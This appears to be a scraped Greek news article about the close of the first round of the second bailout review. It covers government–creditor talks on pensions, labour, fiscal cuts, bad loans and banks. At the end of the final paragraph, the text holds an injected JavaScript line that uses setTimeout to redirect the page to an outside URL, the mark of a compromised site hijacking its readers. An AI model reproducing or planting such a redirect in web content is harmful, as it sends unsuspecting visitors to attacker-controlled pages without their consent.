Κλείνει ο πρώτος κύκλος της β’ αξιολόγησης – Εργασιακά και δημοσιονομικά στο επίκεντρο

0
9

 

Το πρώτο δεκαήμερο του Νοεμβρίου θα συνεχστούν οι υζητήσεις στο πλαίσιο της δεύτερης αξιολόγησης του προγράμματος καθώς σήμερα ολοκληρώνεται ο πρώτος κύκλος. Ασφαλιστικό, εργασιακά, δημοσιονομικά, κόκκινα δάνεια και τράπεζες θα βρεθούν στο επίκεντρο των διαπραγματεύσεων της κυβέρνησης με τους δανειστές σήμερα.

Το υπουργείο Εργασίας θα έχει διπλή συνάντηση μέσα στην ημέρα, στις οποίες θα συζητηθούν τα φλέγοντα ζητήματα του ασφαλιστικού και των εργασιακών.

Οι δανειστές έχουν εκφράσει τη δυσαρέσκειά τους από την πορεία εφαρμογής των μέτρων εξοικονόμησης δαπανών κατά 1%, που είχε συμφωνηθεί τον προηγούμενο Μάιο και παρά το ότι ο υπουργός Εργασίας δηλώνει ρητά ότι, «το ασφαλιστικό έχει κλείσει», αναμένεται να ζητηθεί επίσπευση των εκκρεμών αποφάσεων, για την πλήρη εφαρμογή των συμφωνηθέντων, στο πλαίσιο της πρώτης αξιολόγησης, περικοπών.

Θα ζητηθεί, επίσης, «οδικός χάρτης» για την επίσημη σύσταση και πλήρη λειτουργία του Ενιαίου Φορέα Κύριας Ασφάλισης, στο οποίο θα περιληφθούν όλα τα Ασφαλιστικά Ταμεία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here